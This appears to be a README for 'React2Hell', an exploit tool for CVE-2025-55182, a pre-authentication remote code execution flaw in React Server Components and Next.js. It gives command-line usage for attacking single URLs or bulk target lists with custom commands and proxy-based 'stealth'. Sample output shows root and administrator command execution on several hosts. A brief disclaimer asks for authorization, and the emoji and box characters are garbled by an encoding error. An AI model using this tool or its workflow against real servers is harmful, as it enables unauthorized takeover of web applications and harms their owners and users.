Share
## https://sploitus.com/exploit?id=B00FDC85-D341-5A42-BC6C-714D9F5096AA
# ๐Ÿงจ **React2Hell โ€” CVE-2025-55182 Exploit**

๐Ÿ”ฅ *Next.js / React Server Remote Code Execution (RCE) Exploit*

```
โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–„  โ–„โ–„โ–„โ–„โ–„  โ–„โ–„โ–„   โ–„โ–„โ–„โ–„ โ–„โ–„โ–„โ–„โ–„โ–„ โ–ˆโ–ˆโ–ˆโ–ˆโ–„ โ–ˆโ–ˆ  โ–ˆโ–ˆ โ–„โ–„โ–„โ–„โ–„ โ–„โ–„    โ–„โ–„
โ–ˆโ–ˆโ–„โ–„โ–ˆโ–ˆโ–„ โ–ˆโ–ˆโ–„โ–„  โ–ˆโ–ˆโ–€โ–ˆโ–ˆ โ–ˆโ–ˆโ–€โ–€โ–€   โ–ˆโ–ˆ    โ–„โ–ˆโ–ˆโ–€ โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ โ–ˆโ–ˆโ–„โ–„  โ–ˆโ–ˆ    โ–ˆโ–ˆ
โ–ˆโ–ˆ   โ–ˆโ–ˆ โ–ˆโ–ˆโ–„โ–„โ–„ โ–ˆโ–ˆโ–€โ–ˆโ–ˆ โ–€โ–ˆโ–ˆโ–ˆโ–ˆ   โ–ˆโ–ˆ   โ–ˆโ–ˆโ–ˆโ–„โ–„ โ–ˆโ–ˆ  โ–ˆโ–ˆ โ–ˆโ–ˆโ–„โ–„โ–„ โ–ˆโ–ˆโ–„โ–„โ–„ โ–ˆโ–ˆโ–„โ–„โ–„

 Next.js/React Server RCE Exploit โ€” CVE-2025-55182
   Author: Chetanya Sharma (AggressiveUser)

โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
usage: new.py [-h] [-u URL] [-l LIST] -c COMMAND [--proxy PROXY] [--proxy-https PROXY_HTTPS]
```

---

## ๐Ÿš€ Overview

**React2Hell** is a powerful exploitation tool designed to test and exploit **CVE-2025-55182**, a critical Remote Code Execution vulnerability affecting **Next.js** & **React Server Actions**.

A pre-authentication remote code execution vulnerability exists in React Server Components versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 including the following packages: react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. The vulnerable code unsafely deserializes payloads from HTTP requests to Server Function endpoints.

---

## โœจ Features

* ๐Ÿงจ **Remote Code Execution (RCE)**
* ๐ŸŒ **Single URL / Bulk URL scanning**
* ๐Ÿงฉ **Custom command execution**
* ๐Ÿ•ต๏ธโ€โ™‚๏ธ **Stealth mode with proxy support**
* โšก Fast, reliable, and easy to use

---

## ๐Ÿ“Œ Usage

### **Single Target Mode**

```
python exploit.py -u https://target.com -c "whoami"
```

### **Multiple Targets (from file)**

```
python exploit.py -l urls.txt -c "whoami"
```

### **With HTTP Proxy (Burp Suite)**

```
python exploit.py -u https://target.com -c "whoami" --proxy 127.0.0.1:8080
```

### **With HTTPS Proxy**

```
python exploit.py -u https://target.com -c "whoami" --proxy-https 127.0.0.1:8080
```

---

## ๐Ÿ“ urls.txt Example

```
http://site1.com
https://site2.com
http://192.168.1.10:3000
```

---

## ๐Ÿ–ฅ๏ธ Sample Output

```
PS D:\AggressiveUser_PVT\React2Hell> python.exe .\exploit.py -l .\list.txt -c whoami


โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–„  โ–„โ–„โ–„โ–„โ–„  โ–„โ–„โ–„   โ–„โ–„โ–„โ–„ โ–„โ–„โ–„โ–„โ–„โ–„ โ–ˆโ–ˆโ–ˆโ–ˆโ–„ โ–ˆโ–ˆ  โ–ˆโ–ˆ โ–„โ–„โ–„โ–„โ–„ โ–„โ–„    โ–„โ–„
โ–ˆโ–ˆโ–„โ–„โ–ˆโ–ˆโ–„ โ–ˆโ–ˆโ–„โ–„  โ–ˆโ–ˆโ–€โ–ˆโ–ˆ โ–ˆโ–ˆโ–€โ–€โ–€   โ–ˆโ–ˆ    โ–„โ–ˆโ–ˆโ–€ โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ โ–ˆโ–ˆโ–„โ–„  โ–ˆโ–ˆ    โ–ˆโ–ˆ
โ–ˆโ–ˆ   โ–ˆโ–ˆ โ–ˆโ–ˆโ–„โ–„โ–„ โ–ˆโ–ˆโ–€โ–ˆโ–ˆ โ–€โ–ˆโ–ˆโ–ˆโ–ˆ   โ–ˆโ–ˆ   โ–ˆโ–ˆโ–ˆโ–„โ–„ โ–ˆโ–ˆ  โ–ˆโ–ˆ โ–ˆโ–ˆโ–„โ–„โ–„ โ–ˆโ–ˆโ–„โ–„โ–„ โ–ˆโ–ˆโ–„โ–„โ–„

 Next.js/React Server RCE Exploit โ€” CVE-2025-55182
   Author: Chetanya Sharma (AggressiveUser)

โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
[+] Loaded 3 targets
โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

[โ†’] Target: http://meow.host:3113/
[โ†’] Exec:   whoami
[โœ“] VULNERABLE โ€” RCE Successful!
------------------------------------------------------------
root
------------------------------------------------------------
โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€

[โ†’] Target: http://evil.lab:2000/
[โ†’] Exec:   whoami
[โœ—] Not vulnerable โ€” Status: 200
โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€

[โ†’] Target: https://vul.lab:3000/
[โ†’] Exec:   whoami
[โœ“] VULNERABLE โ€” RCE Successful!
------------------------------------------------------------
win-1fl835ovldc\\administrator
------------------------------------------------------------
โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
[โœ“] Scan complete โ€” Vulnerable: 2
PS D:\AggressiveUser_PVT\React2Hell>
```

---

## โš ๏ธ Disclaimer

> **This tool is created strictly for educational & security research purposes.
> Do NOT use it on systems without explicit authorization.
> You are responsible for your own actions.**

---

## โญ Support the Project

If this exploit helped you, consider leaving a โญ on GitHub โค๏ธ

---

## ๐Ÿ‘ค Author

**Chetanya Sharma AggressiveUser**

Made with ๐Ÿ”ฅ by someone who enjoys breaking & fixing things.

---